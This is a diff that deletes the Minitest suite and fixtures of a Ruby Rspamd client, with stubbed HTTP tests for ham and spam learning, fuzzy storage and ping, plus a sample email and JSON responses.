-  end
-
-  def test_successfully_reporting_a_message_as_ham
-    request = stub_request(:post, "http://localhost:11333/learnham")
-      .with(body: mail(:ham))
-      .to_return(status: 200, body: '{"success": true}')
-
-    assert @client.ham!(mail(:ham))
-    assert_requested request
-  end
-
-  def test_successfully_adding_a_message_to_fuzzy_storage
-    request = stub_request(:post, "http://localhost:11333/fuzzyadd")
-      .with(body: mail(:ham))
-      .to_return(status: 200, body: '{"success": true}')
-
-    assert @client.add_fuzzy(mail(:ham))
-    assert_requested request
-  end
-
-  def test_successfully_deleting_a_message_from_fuzzy_storage
-    request = stub_request(:post, "http://localhost:11333/fuzzydel")
-      .with(body: mail(:ham))
-      .to_return(status: 200, body: '{"success": true}')
-
-    assert @client.delete_fuzzy(mail(:ham))
-    assert_requested request
-  end
-
-  def test_unsuccessfully_reporting_a_message_as_ham
-    stub_request(:post, "http://localhost:11333/learnham")
-      .with(body: mail(:ham))
-      .to_return(status: 500, body: '{"error": "Unknown statistics error, found when storing data on backend"}')
-
-    error = assert_raises(Rspamd::Error) { @client.ham!(mail(:ham)) }
-    assert_equal "Unknown statistics error, found when storing data on backend", error.message
-  end
-
-  def test_reporting_a_previously_reported_message_as_spam
-    request = stub_request(:post, "http://localhost:11333/learnspam")
-      .with(body: mail(:ham))
-      .to_return(status: 208, body: response("already_reported.json"))
-
-    assert !@client.spam!(mail(:ham))
-    assert_requested request
-  end
-
-  def test_reporting_a_message_with_too_few_tokens_as_spam
-    request = stub_request(:post, "http://localhost:11333/learnspam")
-      .with(body: mail(:ham))
-      .to_return(status: [ 204, "<undef> contains less tokens than required for bayes classifier: 3 < 11" ])
-
-    assert !@client.spam!(mail(:ham))
-    assert_requested request
-  end
-
-  def test_customizing_user_agent
-    stub_request(:get, "http://localhost:11333/ping").to_return(status: 200, body: "pong\r\n")
-    assert Rspamd::Client.new(host: "localhost", port: "11333", user_agent: "Rspamd tests").ping
-    assert_requested :get, "http://localhost:11333/ping", headers: { "User-Agent" => "Rspamd tests" }
-  end
-
-  private
-    def mail(name)
-      fixture "mail/#{name}.eml"
-    end
-
-    def response(path)
-      fixture "responses/#{path}"
-    end
-
-    def fixture(path)
-      File.read File.expand_path("fixtures/#{path}", __dir__)
-    end
-end

data/test/fixtures/mail/ham.eml

@@ -1,19 +0,0 @@
-Date: Tue, 21 Jan 2020 21:04:42 +0000
-From: Alice <alice@example.com>
-To: Bob <bob@example.com>
-Message-ID: <975bad33-2e76-40c3-89aa-7fe1edcbe7ce@example.com>
-Subject: Hello
-Mime-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: quoted-printable
-Delivered-To: bob@example.com
-
-Hi Bob! Check these out:
-
-    foo.example.com/bar
-    bar.example.com/baz
-    baz.example.com/quux
-
-Best,
-Alice
-alice@example.com

data/test/fixtures/responses/already_reported.json

@@ -1 +0,0 @@
-{"error": "<975bad33-2e76-40c3-89aa-7fe1edcbe7ce@example.com> already learned as spam, ignore it"}

data/test/fixtures/responses/ham.json

@@ -1,12 +0,0 @@
-{
-  "is_skipped": false,
-  "score": 1.0,
-  "required_score": 15.0,
-  "action": "no action",
-  "urls": [
-    "foo.example.com",
-    "bar.example.com",
-    "baz.example.com"
-  ],
-  "emails": ["alice@example.com"]
-}

data/test/fixtures/responses/spam.json

@@ -1,7 +0,0 @@
-{
-  "is_skipped":false,
-  "score":17.8,
-  "required_score":6.0,
-  "action":"add header",
-  "message-id":"9e8250ea40f5bd34dea5f14555c8d74d1966d6cd@hey.com"
-}

data/test/test_helper.rb

@@ -1,4 +0,0 @@
-require "minitest/autorun"
-require "webmock/minitest"
-require "rspamd-ruby"
-require "debug"